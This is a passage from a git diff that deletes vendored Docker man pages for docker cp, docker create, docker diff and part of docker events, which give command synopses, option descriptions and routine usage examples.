-      "detachKeys": "ctrl-e,e"
-    }
-
-# HISTORY
-January 2016, created by Moxiegirl <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-cp.1.md b/vendor/github.com/docker/docker/man/docker-cp.1.md
deleted file mode 100644
index 949d60bb8b..0000000000
--- a/vendor/github.com/docker/docker/man/docker-cp.1.md
+++ /dev/null
@@ -1,175 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-cp - Copy files/folders between a container and the local filesystem.
-
-# SYNOPSIS
-**docker cp**
-[**--help**]
-CONTAINER:SRC_PATH DEST_PATH|-
-
-**docker cp**
-[**--help**]
-SRC_PATH|- CONTAINER:DEST_PATH
-
-# DESCRIPTION
-
-The `docker cp` utility copies the contents of `SRC_PATH` to the `DEST_PATH`.
-You can copy from the container's file system to the local machine or the
-reverse, from the local filesystem to the container. If `-` is specified for
-either the `SRC_PATH` or `DEST_PATH`, you can also stream a tar archive from
-`STDIN` or to `STDOUT`. The `CONTAINER` can be a running or stopped container.
-The `SRC_PATH` or `DEST_PATH` can be a file or directory.
-
-The `docker cp` command assumes container paths are relative to the container's 
-`/` (root) directory. This means supplying the initial forward slash is optional; 
-The command sees `compassionate_darwin:/tmp/foo/myfile.txt` and
-`compassionate_darwin:tmp/foo/myfile.txt` as identical. Local machine paths can
-be an absolute or relative value. The command interprets a local machine's
-relative paths as relative to the current working directory where `docker cp` is
-run.
-
-The `cp` command behaves like the Unix `cp -a` command in that directories are
-copied recursively with permissions preserved if possible. Ownership is set to
-the user and primary group at the destination. For example, files copied to a
-container are created with `UID:GID` of the root user. Files copied to the local
-machine are created with the `UID:GID` of the user which invoked the `docker cp`
-command.  If you specify the `-L` option, `docker cp` follows any symbolic link
-in the `SRC_PATH`. `docker cp` does *not* create parent directories for
-`DEST_PATH` if they do not exist.
-
-Assuming a path separator of `/`, a first argument of `SRC_PATH` and second
-argument of `DEST_PATH`, the behavior is as follows:
-
-- `SRC_PATH` specifies a file
-    - `DEST_PATH` does not exist
-        - the file is saved to a file created at `DEST_PATH`
-    - `DEST_PATH` does not exist and ends with `/`
-        - Error condition: the destination directory must exist.
-    - `DEST_PATH` exists and is a file
-        - the destination is overwritten with the source file's contents
-    - `DEST_PATH` exists and is a directory
-        - the file is copied into this directory using the basename from
-          `SRC_PATH`
-- `SRC_PATH` specifies a directory
-    - `DEST_PATH` does not exist
-        - `DEST_PATH` is created as a directory and the *contents* of the source
-           directory are copied into this directory
-    - `DEST_PATH` exists and is a file
-        - Error condition: cannot copy a directory to a file
-    - `DEST_PATH` exists and is a directory
-        - `SRC_PATH` does not end with `/.`
-            - the source directory is copied into this directory
-        - `SRC_PATH` does end with `/.`
-            - the *content* of the source directory is copied into this
-              directory
-
-The command requires `SRC_PATH` and `DEST_PATH` to exist according to the above
-rules. If `SRC_PATH` is local and is a symbolic link, the symbolic link, not
-the target, is copied by default. To copy the link target and not the link, 
-specify the `-L` option.
-
-A colon (`:`) is used as a delimiter between `CONTAINER` and its path. You can
-also use `:` when specifying paths to a `SRC_PATH` or `DEST_PATH` on a local
-machine, for example  `file:name.txt`. If you use a `:` in a local machine path,
-you must be explicit with a relative or absolute path, for example:
-
-    `/path/to/file:name.txt` or `./file:name.txt`
-
-It is not possible to copy certain system files such as resources under
-`/proc`, `/sys`, `/dev`, tmpfs, and mounts created by the user in the container.
-However, you can still copy such files by manually running `tar` in `docker exec`.
-For example (consider `SRC_PATH` and `DEST_PATH` are directories):
-
-    $ docker exec foo tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | tar Cxf DEST_PATH -
-
-or
-
-    $ tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | docker exec -i foo tar Cxf DEST_PATH -
-
-
-Using `-` as the `SRC_PATH` streams the contents of `STDIN` as a tar archive.
-The command extracts the content of the tar to the `DEST_PATH` in container's
-filesystem. In this case, `DEST_PATH` must specify a directory. Using `-` as
-the `DEST_PATH` streams the contents of the resource as a tar archive to `STDOUT`.
-
-# OPTIONS
-**-L**, **--follow-link**=*true*|*false*
-  Follow symbol link in SRC_PATH
-
-**--help**
-  Print usage statement
-
-# EXAMPLES
-
-Suppose a container has finished producing some output as a file it saves
-to somewhere in its filesystem. This could be the output of a build job or
-some other computation. You can copy these outputs from the container to a
-location on your local host.
-
-If you want to copy the `/tmp/foo` directory from a container to the
-existing `/tmp` directory on your host. If you run `docker cp` in your `~`
-(home) directory on the local host:
-
-    $ docker cp compassionate_darwin:tmp/foo /tmp
-
-Docker creates a `/tmp/foo` directory on your host. Alternatively, you can omit
-the leading slash in the command. If you execute this command from your home
-directory:
-
-    $ docker cp compassionate_darwin:tmp/foo tmp
-
-If `~/tmp` does not exist, Docker will create it and copy the contents of
-`/tmp/foo` from the container into this new directory. If `~/tmp` already
-exists as a directory, then Docker will copy the contents of `/tmp/foo` from
-the container into a directory at `~/tmp/foo`.
-
-When copying a single file to an existing `LOCALPATH`, the `docker cp` command
-will either overwrite the contents of `LOCALPATH` if it is a file or place it
-into `LOCALPATH` if it is a directory, overwriting an existing file of the same
-name if one exists. For example, this command:
-
-    $ docker cp sharp_ptolemy:/tmp/foo/myfile.txt /test
-
-If `/test` does not exist on the local machine, it will be created as a file
-with the contents of `/tmp/foo/myfile.txt` from the container. If `/test`
-exists as a file, it will be overwritten. Lastly, if `/test` exists as a
-directory, the file will be copied to `/test/myfile.txt`.
-
-Next, suppose you want to copy a file or folder into a container. For example,
-this could be a configuration file or some other input to a long running
-computation that you would like to place into a created container before it
-starts. This is useful because it does not require the configuration file or
-other input to exist in the container image.
-
-If you have a file, `config.yml`, in the current directory on your local host
-and wish to copy it to an existing directory at `/etc/my-app.d` in a container,
-this command can be used:
-
-    $ docker cp config.yml myappcontainer:/etc/my-app.d
-
-If you have several files in a local directory `/config` which you need to copy
-to a directory `/etc/my-app.d` in a container:
-
-    $ docker cp /config/. myappcontainer:/etc/my-app.d
-
-The above command will copy the contents of the local `/config` directory into
-the directory `/etc/my-app.d` in the container.
-
-Finally, if you want to copy a symbolic link into a container, you typically
-want to  copy the linked target and not the link itself. To copy the target, use
-the `-L` option, for example:
-
-    $ ln -s /tmp/somefile /tmp/somefile.ln
-    $ docker cp -L /tmp/somefile.ln myappcontainer:/tmp/
-
-This command copies content of the local `/tmp/somefile` into the file
-`/tmp/somefile.ln` in the container. Without `-L` option, the `/tmp/somefile.ln`
-preserves its symbolic link but not its content.
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-May 2015, updated by Josh Hawn <josh.hawn@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-create.1.md b/vendor/github.com/docker/docker/man/docker-create.1.md
deleted file mode 100644
index 3f8a076374..0000000000
--- a/vendor/github.com/docker/docker/man/docker-create.1.md
+++ /dev/null
@@ -1,553 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-create - Create a new container
-
-# SYNOPSIS
-**docker create**
-[**-a**|**--attach**[=*[]*]]
-[**--add-host**[=*[]*]]
-[**--blkio-weight**[=*[BLKIO-WEIGHT]*]]
-[**--blkio-weight-device**[=*[]*]]
-[**--cpu-shares**[=*0*]]
-[**--cap-add**[=*[]*]]
-[**--cap-drop**[=*[]*]]
-[**--cgroup-parent**[=*CGROUP-PATH*]]
-[**--cidfile**[=*CIDFILE*]]
-[**--cpu-count**[=*0*]]
-[**--cpu-percent**[=*0*]]
-[**--cpu-period**[=*0*]]
-[**--cpu-quota**[=*0*]]
-[**--cpu-rt-period**[=*0*]]
-[**--cpu-rt-runtime**[=*0*]]
-[**--cpus**[=*0.0*]]
-[**--cpuset-cpus**[=*CPUSET-CPUS*]]
-[**--cpuset-mems**[=*CPUSET-MEMS*]]
-[**--device**[=*[]*]]
-[**--device-read-bps**[=*[]*]]
-[**--device-read-iops**[=*[]*]]
-[**--device-write-bps**[=*[]*]]
-[**--device-write-iops**[=*[]*]]
-[**--dns**[=*[]*]]
-[**--dns-search**[=*[]*]]
-[**--dns-option**[=*[]*]]
-[**-e**|**--env**[=*[]*]]
-[**--entrypoint**[=*ENTRYPOINT*]]
-[**--env-file**[=*[]*]]
-[**--expose**[=*[]*]]
-[**--group-add**[=*[]*]]
-[**-h**|**--hostname**[=*HOSTNAME*]]
-[**--help**]
-[**-i**|**--interactive**]
-[**--ip**[=*IPv4-ADDRESS*]]
-[**--ip6**[=*IPv6-ADDRESS*]]
-[**--ipc**[=*IPC*]]
-[**--isolation**[=*default*]]
-[**--kernel-memory**[=*KERNEL-MEMORY*]]
-[**-l**|**--label**[=*[]*]]
-[**--label-file**[=*[]*]]
-[**--link**[=*[]*]]
-[**--link-local-ip**[=*[]*]]
-[**--log-driver**[=*[]*]]
-[**--log-opt**[=*[]*]]
-[**-m**|**--memory**[=*MEMORY*]]
-[**--mac-address**[=*MAC-ADDRESS*]]
-[**--memory-reservation**[=*MEMORY-RESERVATION*]]
-[**--memory-swap**[=*LIMIT*]]
-[**--memory-swappiness**[=*MEMORY-SWAPPINESS*]]
-[**--name**[=*NAME*]]
-[**--network-alias**[=*[]*]]
-[**--network**[=*"bridge"*]]
-[**--oom-kill-disable**]
-[**--oom-score-adj**[=*0*]]
-[**-P**|**--publish-all**]
-[**-p**|**--publish**[=*[]*]]
-[**--pid**[=*[PID]*]]
-[**--userns**[=*[]*]]
-[**--pids-limit**[=*PIDS_LIMIT*]]
-[**--privileged**]
-[**--read-only**]
-[**--restart**[=*RESTART*]]
-[**--rm**]
-[**--security-opt**[=*[]*]]
-[**--storage-opt**[=*[]*]]
-[**--stop-signal**[=*SIGNAL*]]
-[**--stop-timeout**[=*TIMEOUT*]]
-[**--shm-size**[=*[]*]]
-[**--sysctl**[=*[]*]]
-[**-t**|**--tty**]
-[**--tmpfs**[=*[CONTAINER-DIR[:<OPTIONS>]*]]
-[**-u**|**--user**[=*USER*]]
-[**--ulimit**[=*[]*]]
-[**--uts**[=*[]*]]
-[**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*]]
-[**--volume-driver**[=*DRIVER*]]
-[**--volumes-from**[=*[]*]]
-[**-w**|**--workdir**[=*WORKDIR*]]
-IMAGE [COMMAND] [ARG...]
-
-# DESCRIPTION
-
-Creates a writeable container layer over the specified image and prepares it for
-running the specified command. The container ID is then printed to STDOUT. This
-is similar to **docker run -d** except the container is never started. You can 
-then use the **docker start <container_id>** command to start the container at
-any point.
-
-The initial status of the container created with **docker create** is 'created'.
-
-# OPTIONS
-**-a**, **--attach**=[]
-   Attach to STDIN, STDOUT or STDERR.
-
-**--add-host**=[]
-   Add a custom host-to-IP mapping (host:ip)
-
-**--blkio-weight**=*0*
-   Block IO weight (relative weight) accepts a weight value between 10 and 1000.
-
-**--blkio-weight-device**=[]
-   Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`).
-
-**--cpu-shares**=*0*
-   CPU shares (relative weight)
-
-**--cap-add**=[]
-   Add Linux capabilities
-
-**--cap-drop**=[]
-   Drop Linux capabilities
-
-**--cgroup-parent**=""
-   Path to cgroups under which the cgroup for the container will be created. If the path is not absolute, the path is considered to be relative to the cgroups path of the init process. Cgroups will be created if they do not already exist.
-
-**--cidfile**=""
-   Write the container ID to the file
-
-**--cpu-count**=*0*
-    Limit the number of CPUs available for execution by the container.
-    
-    On Windows Server containers, this is approximated as a percentage of total CPU usage.
-
-    On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last.
-
-**--cpu-percent**=*0*
-    Limit the percentage of CPU available for execution by a container running on a Windows daemon.
-
-    On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last.
-
-**--cpu-period**=*0*
-    Limit the CPU CFS (Completely Fair Scheduler) period
-
-    Limit the container's CPU usage. This flag tell the kernel to restrict the container's CPU usage to the period you specify.
-
-**--cpuset-cpus**=""
-   CPUs in which to allow execution (0-3, 0,1)
-
-**--cpuset-mems**=""
-   Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems.
-
-   If you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1`
-then processes in your Docker container will only use memory from the first
-two memory nodes.
-
-**--cpu-quota**=*0*
-   Limit the CPU CFS (Completely Fair Scheduler) quota
-
-**--cpu-rt-period**=0
-   Limit the CPU real-time period in microseconds
-
-   Limit the container's Real Time CPU usage. This flag tell the kernel to restrict the container's Real Time CPU usage to the period you specify.
-
-**--cpu-rt-runtime**=0
-   Limit the CPU real-time runtime in microseconds
-
-   Limit the containers Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. Ex:
-   Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks.
-
-   The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup.
-
-**--cpus**=0.0
-   Number of CPUs. The default is *0.0*.
-
-**--device**=[]
-   Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm)
-
-**--device-read-bps**=[]
-    Limit read rate (bytes per second) from a device (e.g. --device-read-bps=/dev/sda:1mb)
-
-**--device-read-iops**=[]
-    Limit read rate (IO per second) from a device (e.g. --device-read-iops=/dev/sda:1000)
-
-**--device-write-bps**=[]
-    Limit write rate (bytes per second) to a device (e.g. --device-write-bps=/dev/sda:1mb)
-
-**--device-write-iops**=[]
-    Limit write rate (IO per second) to a device (e.g. --device-write-iops=/dev/sda:1000)
-
-**--dns**=[]
-   Set custom DNS servers
-
-**--dns-option**=[]
-   Set custom DNS options
-
-**--dns-search**=[]
-   Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain)
-
-**-e**, **--env**=[]
-   Set environment variables
-
-**--entrypoint**=""
-   Overwrite the default ENTRYPOINT of the image
-
-**--env-file**=[]
-   Read in a line-delimited file of environment variables
-
-**--expose**=[]
-   Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host
-
-**--group-add**=[]
-   Add additional groups to run as
-
-**-h**, **--hostname**=""
-   Container host name
-
-**--help**
-  Print usage statement
-
-**-i**, **--interactive**=*true*|*false*
-   Keep STDIN open even if not attached. The default is *false*.
-
-**--ip**=""
-   Sets the container's interface IPv4 address (e.g. 172.23.0.9)
-
-   It can only be used in conjunction with **--network** for user-defined networks
-
-**--ip6**=""
-   Sets the container's interface IPv6 address (e.g. 2001:db8::1b99)
-
-   It can only be used in conjunction with **--network** for user-defined networks
-
-**--ipc**=""
-   Default is to create a private IPC namespace (POSIX SysV IPC) for the container
-                               'container:<name|id>': reuses another container shared memory, semaphores and message queues
-                               'host': use the host shared memory,semaphores and message queues inside the container.  Note: the host mode gives the container full access to local shared memory and is therefore considered insecure.
-
-**--isolation**="*default*"
-   Isolation specifies the type of isolation technology used by containers. Note
-that the default on Windows server is `process`, and the default on Windows client
-is `hyperv`. Linux only supports `default`.
-
-**--kernel-memory**=""
-   Kernel memory limit (format: `<number>[<unit>]`, where unit = b, k, m or g)
-
-   Constrains the kernel memory available to a container. If a limit of 0
-is specified (not using `--kernel-memory`), the container's kernel memory
-is not limited. If you specify a limit, it may be rounded up to a multiple
-of the operating system's page size and the value can be very large,
-millions of trillions.
-
-**-l**, **--label**=[]
-   Adds metadata to a container (e.g., --label=com.example.key=value)
-
-**--label-file**=[]
-   Read labels from a file. Delimit each label with an EOL.
-
-**--link**=[]
-   Add link to another container in the form of <name or id>:alias or just
-   <name or id> in which case the alias will match the name.
-
-**--link-local-ip**=[]
-   Add one or more link-local IPv4/IPv6 addresses to the container's interface
-
-**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*"
-  Logging driver for the container. Default is defined by daemon `--log-driver` flag.
-  **Warning**: the `docker logs` command works only for the `json-file` and
-  `journald` logging drivers.
-
-**--log-opt**=[]
-  Logging driver specific options.
-
-**-m**, **--memory**=""
-   Memory limit (format: <number>[<unit>], where unit = b, k, m or g)
-
-   Allows you to constrain the memory available to a container. If the host
-supports swap memory, then the **-m** memory setting can be larger than physical
-RAM. If a limit of 0 is specified (not using **-m**), the container's memory is
-not limited. The actual limit may be rounded up to a multiple of the operating
-system's page size (the value would be very large, that's millions of trillions).
-
-**--mac-address**=""
-   Container MAC address (e.g. 92:d0:c6:0a:29:33)
-
-**--memory-reservation**=""
-   Memory soft limit (format: <number>[<unit>], where unit = b, k, m or g)
-
-   After setting memory reservation, when the system detects memory contention
-or low memory, containers are forced to restrict their consumption to their
-reservation. So you should always set the value below **--memory**, otherwise the
-hard limit will take precedence. By default, memory reservation will be the same
-as memory limit.
-
-**--memory-swap**="LIMIT"
-   A limit value equal to memory plus swap. Must be used with the  **-m**
-(**--memory**) flag. The swap `LIMIT` should always be larger than **-m**
-(**--memory**) value.
-
-   The format of `LIMIT` is `<number>[<unit>]`. Unit can be `b` (bytes),
-`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a
-unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap.
-
-**--memory-swappiness**=""
-   Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100.
-
-**--name**=""
-   Assign a name to the container
-
-**--network**="*bridge*"
-   Set the Network mode for the container
-                               'bridge': create a network stack on the default Docker bridge
-                               'none': no networking
-                               'container:<name|id>': reuse another container's network stack
-                               'host': use the Docker host network stack.  Note: the host mode gives the container full access to local system services such as D-bus and is therefore considered insecure.
-                               '<network-name>|<network-id>': connect to a user-defined network
-
-**--network-alias**=[]
-   Add network-scoped alias for the container
-
-**--oom-kill-disable**=*true*|*false*
-	Whether to disable OOM Killer for the container or not.
-
-**--oom-score-adj**=""
-    Tune the host's OOM preferences for containers (accepts -1000 to 1000)
-
-**-P**, **--publish-all**=*true*|*false*
-   Publish all exposed ports to random ports on the host interfaces. The default is *false*.
-
-**-p**, **--publish**=[]
-   Publish a container's port, or a range of ports, to the host
-                               format: ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort
-                               Both hostPort and containerPort can be specified as a range of ports. 
-                               When specifying ranges for both, the number of container ports in the range must match the number of host ports in the range. (e.g., `-p 1234-1236:1234-1236/tcp`)
-                               (use 'docker port' to see the actual mapping)
-
-**--pid**=""
-   Set the PID mode for the container
-   Default is to create a private PID namespace for the container
-                               'container:<name|id>': join another container's PID namespace
-                               'host': use the host's PID namespace for the container. Note: the host mode gives the container full access to local PID and is therefore considered insecure.
-
-**--userns**=""
-   Set the usernamespace mode for the container when `userns-remap` option is enabled.
-     **host**: use the host usernamespace and enable all privileged options (e.g., `pid=host` or `--privileged`).
-
-**--pids-limit**=""
-   Tune the container's pids limit. Set `-1` to have unlimited pids for the container.
-
-**--privileged**=*true*|*false*
-   Give extended privileges to this container. The default is *false*.
-
-**--read-only**=*true*|*false*
-   Mount the container's root filesystem as read only.
-
-**--restart**="*no*"
-   Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped).
-
-**--rm**=*true*|*false*
-   Automatically remove the container when it exits. The default is *false*.
-
-**--shm-size**=""
-   Size of `/dev/shm`. The format is `<number><unit>`. `number` must be greater than `0`.
-   Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes.
-   If you omit the size entirely, the system uses `64m`.
-
-**--security-opt**=[]
-   Security Options
-
-   "label:user:USER"   : Set the label user for the container
-    "label:role:ROLE"   : Set the label role for the container
-    "label:type:TYPE"   : Set the label type for the container
-    "label:level:LEVEL" : Set the label level for the container
-    "label:disable"     : Turn off label confinement for the container
-    "no-new-privileges" : Disable container processes from gaining additional privileges
-    "seccomp:unconfined" : Turn off seccomp confinement for the container
-    "seccomp:profile.json :  White listed syscalls seccomp Json file to be used as a seccomp filter
-
-**--storage-opt**=[]
-   Storage driver options per container
-
-   $ docker create -it --storage-opt size=120G fedora /bin/bash
-
-   This (size) will allow to set the container rootfs size to 120G at creation time.
-   This option is only available for the `devicemapper`, `btrfs`, `overlay2` and `zfs` graph drivers.
-   For the `devicemapper`, `btrfs` and `zfs` storage drivers, user cannot pass a size less than the Default BaseFS Size.
-   For the `overlay2` storage driver, the size option is only available if the backing fs is `xfs` and mounted with the `pquota` mount option.
-   Under these conditions, user can pass any size less then the backing fs size.
-  
-**--stop-signal**=*SIGTERM*
-  Signal to stop a container. Default is SIGTERM.
-
-**--stop-timeout**=*10*
-  Timeout (in seconds) to stop a container. Default is 10.
-
-**--sysctl**=SYSCTL
-  Configure namespaced kernel parameters at runtime
-
-  IPC Namespace - current sysctls allowed:
-
-  kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced
-  Sysctls beginning with fs.mqueue.*
-
-  Note: if you use --ipc=host using these sysctls will not be allowed.
-
-  Network Namespace - current sysctls allowed:
-      Sysctls beginning with net.*
-
-  Note: if you use --network=host using these sysctls will not be allowed.
-
-**-t**, **--tty**=*true*|*false*
-   Allocate a pseudo-TTY. The default is *false*.
-
-**--tmpfs**=[] Create a tmpfs mount
-
-   Mount a temporary filesystem (`tmpfs`) mount into a container, for example:
-
-   $ docker run -d --tmpfs /tmp:rw,size=787448k,mode=1777 my_image
-
-   This command mounts a `tmpfs` at `/tmp` within the container.  The supported mount
-options are the same as the Linux default `mount` flags. If you do not specify
-any options, the systems uses the following options:
-`rw,noexec,nosuid,nodev,size=65536k`.
-
-**-u**, **--user**=""
-   Sets the username or UID used and optionally the groupname or GID for the specified command.
-
-   The followings examples are all valid:
-   --user [user | user:group | uid | uid:gid | user:gid | uid:group ]
-
-   Without this argument root user will be used in the container by default.
-
-**--ulimit**=[]
-   Ulimit options
-
-**--uts**=*host*
-   Set the UTS mode for the container
-     **host**: use the host's UTS namespace inside the container.
-     Note: the host mode gives the container access to changing the host's hostname and is therefore considered insecure.
-
-**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*]
-   Create a bind mount. If you specify, ` -v /HOST-DIR:/CONTAINER-DIR`, Docker
-   bind mounts `/HOST-DIR` in the host to `/CONTAINER-DIR` in the Docker
-   container. If 'HOST-DIR' is omitted,  Docker automatically creates the new
-   volume on the host.  The `OPTIONS` are a comma delimited list and can be:
-
-   * [rw|ro]
-   * [z|Z]
-   * [`[r]shared`|`[r]slave`|`[r]private`]
-
-The `CONTAINER-DIR` must be an absolute path such as `/src/docs`. The `HOST-DIR`
-can be an absolute path or a `name` value. A `name` value must start with an
-alphanumeric character, followed by `a-z0-9`, `_` (underscore), `.` (period) or
-`-` (hyphen). An absolute path starts with a `/` (forward slash).
-
-If you supply a `HOST-DIR` that is an absolute path,  Docker bind-mounts to the
-path you specify. If you supply a `name`, Docker creates a named volume by that
-`name`. For example, you can specify either `/foo` or `foo` for a `HOST-DIR`
-value. If you supply the `/foo` value, Docker creates a bind-mount. If you
-supply the `foo` specification, Docker creates a named volume.
-
-You can specify multiple  **-v** options to mount one or more mounts to a
-container. To use these same mounts in other containers, specify the
-**--volumes-from** option also.
-
-You can add `:ro` or `:rw` suffix to a volume to mount it  read-only or
-read-write mode, respectively. By default, the volumes are mounted read-write.
-See examples.
-
-Labeling systems like SELinux require that proper labels are placed on volume
-content mounted into a container. Without a label, the security system might
-prevent the processes running inside the container from using the content. By
-default, Docker does not change the labels set by the OS.
-
-To change a label in the container context, you can add either of two suffixes
-`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file
-objects on the shared volumes. The `z` option tells Docker that two containers
-share the volume content. As a result, Docker labels the content with a shared
-content label. Shared volume labels allow all containers to read/write content.
-The `Z` option tells Docker to label the content with a private unshared label.
-Only the current container can use a private volume.
-
-By default bind mounted volumes are `private`. That means any mounts done
-inside container will not be visible on host and vice-a-versa. One can change
-this behavior by specifying a volume mount propagation property. Making a
-volume `shared` mounts done under that volume inside container will be
-visible on host and vice-a-versa. Making a volume `slave` enables only one
-way mount propagation and that is mounts done on host under that volume
-will be visible inside container but not the other way around.
-
-To control mount propagation property of volume one can use `:[r]shared`,
-`:[r]slave` or `:[r]private` propagation flag. Propagation property can
-be specified only for bind mounted volumes and not for internal volumes or
-named volumes. For mount propagation to work source mount point (mount point
-where source dir is mounted on) has to have right propagation properties. For
-shared volumes, source mount point has to be shared. And for slave volumes,
-source mount has to be either shared or slave.
-
-Use `df <source-dir>` to figure out the source mount and then use
-`findmnt -o TARGET,PROPAGATION <source-mount-dir>` to figure out propagation
-properties of source mount. If `findmnt` utility is not available, then one
-can look at mount entry for source mount point in `/proc/self/mountinfo`. Look
-at `optional fields` and see if any propagaion properties are specified.
-`shared:X` means mount is `shared`, `master:X` means mount is `slave` and if
-nothing is there that means mount is `private`.
-
-To change propagation properties of a mount point use `mount` command. For
-example, if one wants to bind mount source directory `/foo` one can do
-`mount --bind /foo /foo` and `mount --make-private --make-shared /foo`. This
-will convert /foo into a `shared` mount point. Alternatively one can directly
-change propagation properties of source mount. Say `/` is source mount for
-`/foo`, then use `mount --make-shared /` to convert `/` into a `shared` mount.
-
-> **Note**:
-> When using systemd to manage the Docker daemon's start and stop, in the systemd
-> unit file there is an option to control mount propagation for the Docker daemon
-> itself, called `MountFlags`. The value of this setting may cause Docker to not
-> see mount propagation changes made on the mount point. For example, if this value
-> is `slave`, you may not be able to use the `shared` or `rshared` propagation on
-> a volume.
-
-
-To disable automatic copying of data from the container path to the volume, use
-the `nocopy` flag. The `nocopy` flag can be set on bind mounts and named volumes.
-
-**--volume-driver**=""
-   Container's volume driver. This driver creates volumes specified either from
-   a Dockerfile's `VOLUME` instruction or from the `docker run -v` flag.
-   See **docker-volume-create(1)** for full details.
-
-**--volumes-from**=[]
-   Mount volumes from the specified container(s)
-
-**-w**, **--workdir**=""
-   Working directory inside the container
-
-# EXAMPLES
-
-## Specify isolation technology for container (--isolation)
-
-This option is useful in situations where you are running Docker containers on
-Windows. The `--isolation=<value>` option sets a container's isolation
-technology. On Linux, the only supported is the `default` option which uses
-Linux namespaces. On Microsoft Windows, you can specify these values:
-
-* `default`: Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value.
-* `process`: Namespace isolation only.
-* `hyperv`: Hyper-V hypervisor partition-based isolation.
-
-Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`.
-
-# HISTORY
-August 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-September 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-November 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-diff.1.md b/vendor/github.com/docker/docker/man/docker-diff.1.md
deleted file mode 100644
index 6c6c502533..0000000000
--- a/vendor/github.com/docker/docker/man/docker-diff.1.md
+++ /dev/null
@@ -1,49 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-diff - Inspect changes on a container's filesystem
-
-# SYNOPSIS
-**docker diff**
-[**--help**]
-CONTAINER
-
-# DESCRIPTION
-Inspect changes on a container's filesystem. You can use the full or
-shortened container ID or the container name set using
-**docker run --name** option.
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-# EXAMPLES
-Inspect the changes to on a nginx container:
-
-    # docker diff 1fdfd1f54c1b
-    C /dev
-    C /dev/console
-    C /dev/core
-    C /dev/stdout
-    C /dev/fd
-    C /dev/ptmx
-    C /dev/stderr
-    C /dev/stdin
-    C /run
-    A /run/nginx.pid
-    C /var/lib/nginx/tmp
-    A /var/lib/nginx/tmp/client_body
-    A /var/lib/nginx/tmp/fastcgi
-    A /var/lib/nginx/tmp/proxy
-    A /var/lib/nginx/tmp/scgi
-    A /var/lib/nginx/tmp/uwsgi
-    C /var/log/nginx
-    A /var/log/nginx/access.log
-    A /var/log/nginx/error.log
-
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-events.1.md b/vendor/github.com/docker/docker/man/docker-events.1.md
deleted file mode 100644
index 51b042775a..0000000000
--- a/vendor/github.com/docker/docker/man/docker-events.1.md
+++ /dev/null
@@ -1,180 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-events - Get real time events from the server
-
-# SYNOPSIS
-**docker events**
-[**--help**]
-[**-f**|**--filter**[=*[]*]]
-[**--since**[=*SINCE*]]
-[**--until**[=*UNTIL*]]
-[**--format**[=*FORMAT*]]
-
-
-# DESCRIPTION
-Get event information from the Docker daemon. Information can include historical
-information and real-time information.
-
-Docker containers will report the following events:
-
-    attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update
-
-Docker images report the following events:
-
-    delete, import, load, pull, push, save, tag, untag
-
-Docker volumes report the following events:
-
-    create, mount, unmount, destroy
-
-Docker networks report the following events:
-
-    create, connect, disconnect, destroy
-
-# OPTIONS
-**--help**
-  Print usage statement
-
-**-f**, **--filter**=[]
-   Filter output based on these conditions
-   - container (`container=<name or id>`)
-   - event (`event=<event action>`)
-   - image (`image=<tag or id>`)
-   - plugin (experimental) (`plugin=<name or id>`)
-   - label (`label=<key>` or `label=<key>=<value>`)
-   - type (`type=<container or image or volume or network or daemon>`)
-   - volume (`volume=<name or id>`)
-   - network (`network=<name or id>`)
-   - daemon (`daemon=<name or id>`)
-
-**--since**=""
